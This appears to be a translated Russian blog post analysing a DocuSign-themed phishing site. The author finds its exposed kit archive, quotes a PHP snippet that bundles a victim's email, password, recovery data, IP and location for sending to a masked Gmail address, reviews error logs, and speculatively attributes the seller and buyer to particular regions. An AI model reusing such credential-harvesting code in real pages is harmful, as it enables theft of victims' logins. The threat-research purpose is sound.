CoderCastrov logo
CoderCastrov
Безопасность

Изучение фишинговых веб-сайтов и сбор информации для отслеживания злонамеренных акторов

Изучение фишинговых веб-сайтов и сбор информации для отслеживания злонамеренных акторов
просмотров
5 мин чтение
#Безопасность
Table Of Content

Фишинговые атаки.

Одна из самых распространенных угроз, с которой сталкиваются все корпорации в мире, имеющие почтовый сервер, - это фишинговые атаки. Как и везде, некоторые организации лучше защищены, а некоторые - хуже. Однако одно остается неизменным - злоумышленники хотят получить ваши учетные данные.

Сегодня я хочу рассмотреть фишинговую атаку, о которой мне сообщила организация, ставшая ее целью. Основная цель - попытаться пройти следующие шаги.

Все, что я расскажу, можно воспроизвести в вашей собственной среде, независимо от вашего уровня навыков в области безопасности. В будущем вам может потребоваться составить отчет о подобной ситуации. Используйте это в качестве примера того, с чем вы можете столкнуться.

С этим все сказано, давайте перейдем к первым шагам.

По пути к винограднику вы найдете только DocuSign

Таким образом, веб-сайт, который мы рассматриваем сегодня, имеет следующий адрес:

hxxps://surroundser.tk/db/

Обратите внимание на следующие элементы;

Просто посмотрев на эту очень простую картинку, большинство людей могут сказать, что это фишинговый сайт, но это не цель этой статьи. Давайте копнем глубже и изучим исходный код, чтобы узнать, что происходит на заднем плане.

Левое изображение: исходный код основной страницы - Правое изображение: трекер сети при отправке учетных данных через фальшивый сайт.

Здесь нет ничего особенно интересного, судя по всему, это размещено на Cloudflare (хороший выбор). Однако здесь нет ничего особенно интересного и нет случайного выполнения JS/php в фоновом режиме, но меня интересует тот факт, что основная страница этого веб-сайта находится по адресу hxxp://…tk/db/. Что находится за ней?

Ах, Индекс, где ты?

Что ж... Я этого не ожидал. Какой милый парень, однако он умно защитил папку cgi-bin/, но db.zip можно просто скопировать с веб-сайта, это хороший шаг вперед для изучения того, что здесь происходит и исследования того, что находится под капотом.

Ассеты и папки с шаблонами не предоставляют слишком много информации, однако наиболее интересная папка - "inc", здесь находятся два интересных файла .php с названиями functions.php и smarty.php. Внутри файла php найдите следующее.

/****** * * Благословения ******/ $receiver = "t*****11@gmail.com"; $message = "[+]~~~~~~~~~~~~~~~~~Mr*****@Jodo.im~~~~~~~~~~~~~~~~~[+]E-mail: " . $username . "Password: " . $password . "Recovery: " . $recovery . "Type: Docusign — " . $from . "IP: " . $_SERVER['REMOTE_ADDR'] . "City: " . $ipDetails['city'] . "Region: " . $ipDetails['regionName'] . "Country Name: " . $ipDetails['country'] . "Country Code: " . $ipDetails['countryCode'] . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "

Первый адрес электронной почты, похоже, является адресом Gmail, на который отправляются все учетные данные, а также множество общей информации о пользователе, от которого они получены. Однако второй адрес электронной почты является наиболее интересным, адрес "jodo.im" соотносится с восточноевропейской системой Jabber XMPP и "Управлением задачами". (У меня есть предчувствие, куда это ведет)

Кроме того, адрес электронной почты от "Jodo.im" связан с тем, что, кажется, является восточноевропейским продавцом страниц мошенничества, он также предлагает широкий спектр услуг, таких как...

  • Мошеннические страницы eBay UK
  • Мошеннические страницы Deliveroo
  • 25% скидка на праздники Пасхи!
  • ЖИВЫЕ ДЕМО!
Какой мотивированный продавец!

Есть ли что-то еще?

Покупатель, который продолжает вызывать лесные пожары

Как вы можете видеть, мы немного углубляемся в кроличью нору теперь, я думаю, у нас есть хороший профиль продавца этого веб-сайта, но я все еще не удовлетворен, а что насчет покупателя этого веб-сайта? Человек, который, возможно, обманул сотни и сотни людей с помощью этого веб-сайта...

Изучение zip-файла из индекса веб-сайта, кажется, раскрывает несколько вещей, во-первых, очень хороший, но очень краткий журнал ошибок, который содержит следующее.

[05-Jul-2018 14:53:31 UTC] PHP Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/greatmypen/public_html/docs/db/inc/functions.php on line 14[05-Jul-2018 14:53:31 UTC] PHP Warning: file_get_contents(http://ip-api.com/json/169.159.121.121): failed to open stream: no suitable wrapper could be found in /home/greatmypen/public_html/docs/db/inc/functions.php on line 14[23-Aug-2018 19:40:38 UTC] PHP Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/connetesnut/public_html/docs/db/inc/functions.php on line 14[23-Aug-2018 19:40:39 UTC] PHP Warning: file_get_contents(http://ip-api.com/json/199.114.218.126): failed to open stream: no suitable wrapper could be found in /home/connetesnut/public_html/docs/db/inc/functions.php on line 14

Таким образом, кажется, что человек, который настраивал это, использовал ip-api.com, очень популярный извлекатель информации об IP-адресах, однако это вызывает много сигналов тревоги для множества антивирусных программ/систем предотвращения вторжений, если они видят трафик, идущий с этого API, пытающийся получить информацию, поэтому я бы не рекомендовал его использовать. Однако я бы хотел отметить первый IP-адрес - 169.159.121.121. Он принадлежит нигерийской телекоммуникационной компании SmileCows.com, а затем никакой информации/ошибок не видно до 23 августа, но на этот раз с IP-адреса 199.114.218.126 из Дублина, штат Огайо, от технологической компании madeit.com.

Теперь, нравится вам это или нет, я не удивлюсь, если это была атака, исходящая из Нигерии на данный момент. Однако еще одна заметка - имя пользователя в первой ошибке, "greatmypen", несколько раньше в этом году был обманчивый URL-адрес с адресом электронной почты hxxps://great.mypen.is - Может быть, есть шанс, что эти две атаки являются частью одной группы людей?

(Вставьте сюда эмодзи, выражающий размышления)

Заключение — "Нигериец и Сибиряк", Романтический роман о двух влюбленных.

Итак, я считаю, что это заключает наше тщательное расследование о том, кто/что стоит за сегодняшней атакой. Ниже приведены основные моменты, которые я понял как текущую ситуацию и наиболее логичные предположения:

  • Техническая неправильная настройка позволила просматривать код, который не должен был быть виден.
  • Продавец сайта, скорее всего, из Восточной Европы — комментарии, найденные позже в исходном коде, указывают на возможное румынское происхождение.
  • Из-за этого был обнаружен адрес электронной почты продавца и сбора учетных данных.
  • Раскрытие журнала показывает потенциальные данные о местоположении злонамеренного актера.
  • Покупатель, скорее всего, нигерийского/африканского происхождения.
  • Покупатель потенциально может быть связан с другой фишинговой кампанией середины 2018 года.

Это в основном описывает мой опыт, я хотел бы пойти еще дальше и попытаться связаться с продавцом и записать прямую демонстрацию, но, к сожалению, электронная почта недоступна и возвращает только сообщение об ошибке 550. Надеюсь, вам понравилась эта статья так же, как мне понравилось ее написание.

Спасибо за чтение и надеюсь, что вам понравилось погрузиться в эту кроличью нору со мной.